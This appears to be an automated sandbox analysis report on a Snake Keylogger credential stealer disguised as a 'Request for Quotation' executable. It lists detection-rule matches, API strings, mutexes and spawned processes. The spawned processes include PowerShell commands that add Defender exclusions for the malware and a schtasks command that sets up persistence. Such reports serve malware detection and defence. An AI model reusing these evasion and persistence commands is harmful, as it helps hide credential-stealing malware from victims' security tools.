                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000009.00000002.3824755853.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: NuDUTBObHpKADz.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, ---.csBase64 encoded string: 'RvaDBqLex+H7VQrltB7IHeqxo4wofVTOiAhtftTiQbn1Z/62t6lZAA=='
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, ---.csBase64 encoded string: 'RvaDBqLex+H7VQrltB7IHeqxo4wofVTOiAhtftTiQbn1Z/62t6lZAA=='
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, qhA7Vpw3Pa7m92Y2sb.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, qhA7Vpw3Pa7m92Y2sb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, l4lWgpboLH3dw1sHJl.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, l4lWgpboLH3dw1sHJl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, l4lWgpboLH3dw1sHJl.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, qhA7Vpw3Pa7m92Y2sb.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, qhA7Vpw3Pa7m92Y2sb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, l4lWgpboLH3dw1sHJl.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, l4lWgpboLH3dw1sHJl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, l4lWgpboLH3dw1sHJl.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/25@3/3
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeFile created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2600:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
                Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
                Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeMutant created: \Sessions\1\BaseNamedObjects\upSDuQ
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_03
                Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
                Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:592:120:WilError_03
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeFile created: C:\Users\user\AppData\Local\Temp\tmp8B51.tmpJump to behavior
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.drBinary or memory string: INSERT INTO [dbo].[CREDIT_PLAN] ([CREDIT_ID], [MATURITY_DATE], [MATURITY_SUM], [MATURITY_NOTE], [MODIF_DATE]) VALUES (@CREDIT_ID, @MATURITY_DATE, @MATURITY_SUM, @MATURITY_NOTE, @MODIF_DATE);
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.drBinary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE], [INTEREST]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE, @INTEREST);
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.drBinary or memory string: UPDATE [dbo].[Login] SET [User_id] = @User_id, [User_pass] = @User_pass WHERE (([User_id] = @Original_User_id) AND ([User_pass] = @Original_User_pass));
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.drBinary or memory string: UPDATE [dbo].[CREDIT_PLAN] SET [CREDIT_ID] = @CREDIT_ID, [MATURITY_DATE] = @MATURITY_DATE, [MATURITY_SUM] = @MATURITY_SUM, [MATURITY_NOTE] = @MATURITY_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([MATURITY_ID] = @Original_MATURITY_ID) AND ((@IsNull_CREDIT_ID = 1 AND [CREDIT_ID] IS NULL) OR ([CREDIT_ID] = @Original_CREDIT_ID)) AND ([MATURITY_DATE] = @Original_MATURITY_DATE) AND ([MATURITY_SUM] = @Original_MATURITY_SUM) AND ((@IsNull_MATURITY_NOTE = 1 AND [MATURITY_NOTE] IS NULL) OR ([MATURITY_NOTE] = @Original_MATURITY_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.drBinary or memory string: INSERT INTO [dbo].[PROD_PERIODS] ([PROD_CODE], [PROD_PERIOD]) VALUES (@PROD_CODE, @PROD_PERIOD);
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.drBinary or memory string: UPDATE [dbo].[INTEREST] SET [PROD_CODE] = @PROD_CODE, [PROD_PERIOD] = @PROD_PERIOD, [SUM_FROM] = @SUM_FROM, [SUM_TO] = @SUM_TO WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_PERIOD] = @Original_PROD_PERIOD) AND ([SUM_FROM] = @Original_SUM_FROM) AND ([SUM_TO] = @Original_SUM_TO));
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.drBinary or memory string: UPDATE [dbo].[CREDIT] SET [CREDIT_NO] = @CREDIT_NO, [CREDIT_DATE] = @CREDIT_DATE, [CREDIT_PERIOD] = @CREDIT_PERIOD, [CREDIT_END_DATE] = @CREDIT_END_DATE, [CREDIT_BEGIN_DATE] = @CREDIT_BEGIN_DATE, [CLIENT_ID] = @CLIENT_ID, [PROD_CODE] = @PROD_CODE, [CREDIT_SUM] = @CREDIT_SUM, [CREDIT_NOTE] = @CREDIT_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([CREDIT_ID] = @Original_CREDIT_ID) AND ([CREDIT_NO] = @Original_CREDIT_NO) AND ((@IsNull_CREDIT_DATE = 1 AND [CREDIT_DATE] IS NULL) OR ([CREDIT_DATE] = @Original_CREDIT_DATE)) AND ([CREDIT_PERIOD] = @Original_CREDIT_PERIOD) AND ((@IsNull_CREDIT_END_DATE = 1 AND [CREDIT_END_DATE] IS NULL) OR ([CREDIT_END_DATE] = @Original_CREDIT_END_DATE)) AND ((@IsNull_CREDIT_BEGIN_DATE = 1 AND [CREDIT_BEGIN_DATE] IS NULL) OR ([CREDIT_BEGIN_DATE] = @Original_CREDIT_BEGIN_DATE)) AND ([CLIENT_ID] = @Original_CLIENT_ID) AND ((@IsNull_PROD_CODE = 1 AND [PROD_CODE] IS NULL) OR ([PROD_CODE] = @Original_PROD_CODE)) AND ([CREDIT_SUM] = @Original_CREDIT_SUM) AND ((@IsNull_CREDIT_NOTE = 1 AND [CREDIT_NOTE] IS NULL) OR ([CREDIT_NOTE] = @Original_CREDIT_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.drBinary or memory string: UPDATE [dbo].[CREDIT_PRODUCT] SET [PROD_NAME] = @PROD_NAME, [PROD_ACTIVE] = @PROD_ACTIVE, [PROD_SUM_FROM] = @PROD_SUM_FROM, [PROD_SUM_TO] = @PROD_SUM_TO, [MODIF_DATE] = @MODIF_DATE WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_NAME] = @Original_PROD_NAME) AND ([PROD_ACTIVE] = @Original_PROD_ACTIVE) AND ([PROD_SUM_FROM] = @Original_PROD_SUM_FROM) AND ([PROD_SUM_TO] = @Original_PROD_SUM_TO) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003378000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003345000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003353000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003385000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.drBinary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE);
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeReversingLabs: Detection: 52%
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeFile read: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
